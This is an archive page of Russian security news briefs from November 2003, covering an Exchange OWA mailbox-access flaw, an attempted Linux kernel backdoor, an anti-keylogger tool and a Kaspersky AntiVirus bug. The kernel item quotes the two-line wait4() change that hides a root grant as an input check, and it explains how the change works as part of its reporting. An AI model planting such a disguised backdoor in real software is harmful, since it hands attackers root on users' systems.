BugTraq.Ru
Русский BugTraq
https://bugtraq.ru/rsn/?page=383

Russian Security Newsline
Хотите установить RSN на своем сайте?

MS изучает возможную уязвимость Exchange 2003
dl // 25.11.03 03:20
Потенциальная уязвимость находится в компоненте Outlook Web Access (OWA).
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/35.html]
Сообщается, что залогинившись с его помощью, пользователи случайным образом могут попасть в чужие почтовые ящики, причем с полными правами доступа. Предварительное расследование показало, что это вроде бы происходит при запрещенной Kerberos-аутентификации, но обнаруживший данную ошибку администратор настаивает на том, что ничего не запрещал и вообще использовал дефолтовую конфигурацию.

Расследование продолжается, патч тестируется.

Источник: Computerworld
теги: outlook  |  обсудить  |  все отзывы (1)


Еще один неудавшийся бэкдор в ядре Linux
Ktirf // 23.11.03 23:35
Преамбула: для поддержки разработки ядра Linux используется не CVS, а BitKeeper.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/34.html]
Соответственно, львиная доля публикуемых ядер (и все ядра, публикуемые на kernel.org) берутся из BitKeeper. Для тех, кто по разным причинам не хочет или не может пользоваться BitKeeper, группа добровольцев поддерживает CVS-зеркало. Изменения в ядре никогда не вносятся напрямую в CVS, только через BitKeeper.
Собственно новость состоит в том, что 6 ноября уже во второй раз (первый был обнаружен 5 ноября, и о нем уже сообщалось) была предпринята попытка внести "небольшое изменение" в CVS-зеркало ядра. Изменение состояло в добавлении двух строк в системный вызов wait4():

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
  retval = -EINVAL;

Выглядит как проверка входных параметров, но если посмотреть на выражение current->uid = 0, то становится ясно, что локальный процесс, вызывающий wait4() с указанным значением options, получает права суперпользователя - классический бэкдор.
К счастью, в силу сказанного в преамбуле, ни в одно из публикуемых ядер это изменение попасть шансов не имело. BitKeeper же является довольно параноидальной системой - в частности, любое вносимое изменение ядра должно получить подтверждение Линуса или его ближайших помощников. Правда, на данный момент в BitKeeper не встроен механизм ЭЦП, поэтому теоретическая возможность протащить патч, выдав себя за источник, которому Линус или любой утверждающий доверяют, пока остается.

Источник: LWN
теги: linux  |  обсудить  |  все отзывы (1)


И еще раз о плагиате
dl // 23.11.03 21:03
В "Библиотеке" опубликован разбор книги "Защита информации с использованием смарт-карт и электронных брелоков", проведенный Алексеем Лукацким.

Источник: Как педагоги из Таганрога присваивают авторство...
обсудить  |  все отзывы (0)


Долой кейлоггеры
dl // 23.11.03 04:51
Центр информационной безопасности сообщает о выпуске PrivacyKeyboard 2.0, основное назначение которой - противодействие всевзможному "шпионскому" софту, кейлоггерам и т.п.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/32.html]
Программа использует эвристические алгоритмы, учитывающие основные принципы, присущие всем мониторинговым программам, и включает в себя модули защиты от перехвата клавиатуры, от захвата текста/графики из окон, от аппаратных и программных кейлоггеров.

Источник: описание программы
обсудить  |  все отзывы (6)


Ошибка в Kaspersky AntiVirus 4.5.0.48
dl // 22.11.03 12:14
Дмитрий Вольгушин aka J'JF сообщает об ошибке в KAV, проявляющейся при проверке файла, зараженного Macro.Acad.Star - файл не лечится и не удаляется, а движок KAV выдает сообщение об ошибке ядра.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/31.html]
Производитель подтвердил наличие ошибки, но пока непонятно, связана ли она именно с Macro.Acad.Star, или с самим зараженным файлом. Идет работа над решением проблемы.

Дополнение: согласно более позднему сообщению, причина ошибки в том, что лечение, реализованное для зараженных dwg-файлов, применялось и к файлам с исходниками. Обещано исправление в ближайшем кумулятивном обновлении.

Источник: сообщение на форуме
обсудить  |  все отзывы (0)




««    «   381  |  382  |  383  |  384  |  385  |  386  |  387  |  388  |  389  |  390 >>  »    »»


Предложить свою новость



  Copyright © 2001-2025 Dmitry Leonov Design: Vadim Derkach